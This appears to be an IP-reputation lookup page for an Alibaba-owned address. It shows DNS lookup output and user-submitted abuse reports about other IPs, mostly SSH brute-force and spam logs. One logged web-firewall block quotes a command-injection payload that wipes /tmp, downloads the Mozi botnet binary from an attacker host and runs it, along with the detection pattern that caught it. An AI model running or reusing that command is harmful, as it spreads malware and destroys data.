Must be a valid IPv4 or IPv6 ip address, e.g. 127.0.0.1 or 2001:DB8:0:0:8:800:200C:417A
Basic Info

City: unknown

Region: unknown

Country: China

Internet Service Provider: unknown

Hostname: unknown

Organization: Hangzhou Alibaba Advertising Co.,Ltd.

Usage Type: unknown

Comments:
No discussion about this IP yet. Click above link to make one.
Comments on same subnet:
No discussion about this subnet yet..
Whois info:
b
Dig info:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 8.138.80.107
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 41808
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;8.138.80.107.			IN	A

;; AUTHORITY SECTION:
.			260	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2019080902 1800 900 604800 86400

;; Query time: 0 msec
;; SERVER: 67.207.67.2#53(67.207.67.2)
;; WHEN: Sat Aug 10 03:39:07 CST 2019
;; MSG SIZE  rcvd: 116
Host info
Host 107.80.138.8.in-addr.arpa. not found: 3(NXDOMAIN)
Nslookup info:
Server:		67.207.67.2
Address:	67.207.67.2#53

** server can't find 107.80.138.8.in-addr.arpa: NXDOMAIN
Related IP info:
Related comments:
IP Type Details Datetime
188.235.0.207 attackbots
Failed password for invalid user nn from 188.235.0.207 port 55146 ssh2
2020-07-13 21:30:04
51.83.99.228 attackspambots
Jul 13 14:23:18 vpn01 sshd[26008]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=51.83.99.228
Jul 13 14:23:20 vpn01 sshd[26008]: Failed password for invalid user yzi from 51.83.99.228 port 41292 ssh2
...
2020-07-13 21:38:58
62.210.180.62 attack
62.210.180.62 - - [13/Jul/2020:14:23:17 +0200] "POST //xmlrpc.php HTTP/1.1" 403 1031 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
62.210.180.62 - - [13/Jul/2020:14:23:17 +0200] "POST //xmlrpc.php HTTP/1.1" 403 1031 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
...
2020-07-13 21:41:15
131.0.210.68 attack
[13/Jul/2020 x@x
[13/Jul/2020 x@x
[13/Jul/2020 x@x


........
-----------------------------------------------
https://www.blocklist.de/en/view.html?ip=131.0.210.68
2020-07-13 21:12:37
89.248.167.131 attackspambots
Port scan denied
2020-07-13 21:15:43
162.212.113.176 attack
Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\;\\|\\`]\\W*?\\bcc|\\b(wget|curl))\\b|\\/cc(?:[\'"\\|\\;\\`\\-\\s]|$))" at ARGS_NAMES:cd /tmp;rm -rf *;wget http://162.212.113.176:55994/Mozi.a;chmod 777 Mozi.a;/tmp/Mozi.a jaws. [file "/etc/httpd/modsecurity.d/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS_NAMES:cd /tmp;rm -rf *;wget http://162.212.113.176:55994/Mozi.a;chmod 777 Mozi.a;/tmp/Mozi.a jaws
2020-07-13 21:38:40
122.115.57.174 attackspam
Jul 13 13:04:24 rush sshd[32583]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.115.57.174
Jul 13 13:04:26 rush sshd[32583]: Failed password for invalid user jjc from 122.115.57.174 port 11948 ssh2
Jul 13 13:07:28 rush sshd[32671]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.115.57.174
...
2020-07-13 21:18:47
51.38.235.100 attack
2020-07-13T16:11:12.146151lavrinenko.info sshd[30411]: Invalid user lincoln from 51.38.235.100 port 36232
2020-07-13T16:11:12.151385lavrinenko.info sshd[30411]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=51.38.235.100
2020-07-13T16:11:12.146151lavrinenko.info sshd[30411]: Invalid user lincoln from 51.38.235.100 port 36232
2020-07-13T16:11:13.620162lavrinenko.info sshd[30411]: Failed password for invalid user lincoln from 51.38.235.100 port 36232 ssh2
2020-07-13T16:14:36.763467lavrinenko.info sshd[30702]: Invalid user comp from 51.38.235.100 port 33764
...
2020-07-13 21:21:38
213.186.69.250 attackspambots
Email rejected due to spam filtering
2020-07-13 21:34:17
185.143.72.25 attackspam
Jul 13 15:37:27 srv01 postfix/smtpd\[1168\]: warning: unknown\[185.143.72.25\]: SASL LOGIN authentication failed: UGFzc3dvcmQ6
Jul 13 15:38:13 srv01 postfix/smtpd\[12731\]: warning: unknown\[185.143.72.25\]: SASL LOGIN authentication failed: UGFzc3dvcmQ6
Jul 13 15:38:58 srv01 postfix/smtpd\[9481\]: warning: unknown\[185.143.72.25\]: SASL LOGIN authentication failed: UGFzc3dvcmQ6
Jul 13 15:39:42 srv01 postfix/smtpd\[1168\]: warning: unknown\[185.143.72.25\]: SASL LOGIN authentication failed: UGFzc3dvcmQ6
Jul 13 15:40:26 srv01 postfix/smtpd\[12812\]: warning: unknown\[185.143.72.25\]: SASL LOGIN authentication failed: UGFzc3dvcmQ6
...
2020-07-13 21:41:53
91.168.110.88 attackbots
2020-07-13T12:23:33.672Z CLOSE host=91.168.110.88 port=29015 fd=4 time=20.016 bytes=9
...
2020-07-13 21:24:12
165.227.92.35 attackspam
$f2bV_matches
2020-07-13 21:36:07
139.47.64.186 attack
Email rejected due to spam filtering
2020-07-13 21:04:33
45.163.144.2 attack
Too many connections or unauthorized access detected from Arctic banned ip
2020-07-13 21:33:03
111.229.30.206 attack
Jul 13 15:25:31 vps639187 sshd\[12636\]: Invalid user ramesh from 111.229.30.206 port 33598
Jul 13 15:25:31 vps639187 sshd\[12636\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=111.229.30.206
Jul 13 15:25:33 vps639187 sshd\[12636\]: Failed password for invalid user ramesh from 111.229.30.206 port 33598 ssh2
...
2020-07-13 21:30:27

Recently Reported IPs

75.84.78.6 180.165.68.170 2.215.164.126 8.210.166.23
93.42.10.160 119.98.174.209 180.250.85.227 68.78.197.233
24.228.235.102 116.62.247.38 106.4.205.141 24.26.123.99
45.54.50.101 93.159.103.208 120.82.31.195 67.78.79.83
70.45.105.13 57.12.63.77 139.199.117.44 84.29.111.114